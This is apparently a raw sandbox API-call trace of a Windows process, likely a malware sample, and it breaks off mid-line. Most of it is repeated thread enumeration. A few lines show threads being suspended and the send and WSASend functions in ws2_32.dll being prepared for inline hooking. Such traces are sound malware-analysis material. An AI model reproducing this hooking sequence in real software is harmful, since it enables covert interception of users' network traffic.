1 [0176.782] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.782] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.782] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.782] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.783] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.783] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.783] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.783] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.784] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.784] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.784] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.785] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.785] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.785] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.785] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.786] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.786] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.786] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.786] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.787] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.787] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.787] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.849] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.850] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.850] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.850] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.851] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.851] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.851] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.851] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.852] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.852] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.852] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.853] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.853] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.853] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.853] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.854] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.854] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.854] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.854] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.855] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.855] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.855] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.856] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.856] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.856] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.856] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.857] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.857] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.857] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.858] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.858] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.858] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.858] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.859] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.859] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.859] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.859] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.860] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.860] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.860] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.861] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.861] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.861] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.861] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.862] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.862] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.862] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.862] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.863] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.863] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.863] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.864] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.864] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.864] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.864] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.865] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.865] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.865] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.865] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.866] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.866] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.866] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.867] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.867] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.867] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.867] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.868] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.868] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.868] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.869] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.869] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.869] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.869] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.870] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.870] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.870] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.870] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.871] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.871] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.871] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.872] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.872] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.872] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.872] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.873] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.873] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.873] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.873] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.874] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.874] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.874] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.874] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.875] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.875] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.875] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.876] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.876] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.876] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.876] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.877] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.877] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.877] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.877] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.878] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.878] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.878] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.879] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.879] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.879] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.879] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.880] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.880] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.880] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.880] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.881] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.881] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.883] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.884] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.884] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.884] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.885] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.885] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.885] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.885] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.886] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.886] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.886] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.886] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.887] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.887] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.887] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.888] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.888] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.888] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.888] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.889] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.889] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.889] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.889] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.890] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.890] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.890] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.891] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.891] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.891] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.913] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc0) returned 0xa0 [0176.913] SuspendThread (hThread=0xa0) returned 0x0 [0176.913] CloseHandle (hObject=0xa0) returned 1 [0176.914] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x988) returned 0xa0 [0176.914] SuspendThread (hThread=0xa0) returned 0x0 [0176.914] CloseHandle (hObject=0xa0) returned 1 [0176.999] CloseHandle (hObject=0x9c) returned 1 [0176.999] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0176.999] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0176.999] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0176.999] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xf0000 [0176.999] RtlMoveMemory (in: Destination=0xf0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xf0000) [0177.000] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0177.006] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0177.006] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0177.006] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0177.006] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0177.006] RtlMoveMemory (in: Destination=0x100000, Source=0x75bc4406, Length=0x5 | out: Destination=0x100000) [0177.007] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0177.011] GetCurrentProcessId () returned 0x53c [0177.011] GetCurrentThreadId () returned 0x4c8 [0177.011] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0177.013] Thread32First (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.013] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.013] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.013] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.014] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.014] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.014] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.014] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.015] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.015] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.015] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.016] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.016] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.016] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.016] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.017] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.017] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.017] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.017] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.018] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.018] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.018] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.019] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.019] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.019] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.019] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.020] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.020] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.020] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.020] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.021] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.021] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.021] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.022] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.022] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.022] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.022] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.023] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.023] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.023] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.023] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.024] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.024] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.024] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.025] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.025] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.025] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.025] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.026] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.026] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.026] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.026] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.027] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.027] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.027] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.028] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.028] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.028] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.028] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.029] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.029] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.029] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.029] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.030] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.030] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.030] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.031] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.031] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.031] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.031] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.032] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.032] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.032] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.032] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.033] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.033] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.033] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.034] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.034] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.034] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.034] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.035] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.035] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.035] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.035] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.036] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.036] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.036] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.037] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.037] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.037] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.037] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.038] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.038] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.038] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.039] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.039] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.039] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.039] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.040] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.040] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.040] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.041] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.041] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.041] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.042] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.042] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.042] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.043] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.043] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.043] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.044] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.044] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.044] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.044] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.045] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.045] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.045] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.045] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.046] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.046] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.046] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.047] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.047] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.047] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.047] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.048] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.048] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.048] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.048] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.049] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.049] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.049] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.050] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.050] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.050] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.050] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.051] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.051] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.051] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.051] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.052] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.052] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.052] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.053] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.053] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.053] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.053] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.054] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.054] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.054] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.055] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.055] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.055] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.055] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.056] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.056] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.056] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.056] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.057] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.057] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.057] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.058] Thread32Next (hSnapshot=0x9c, 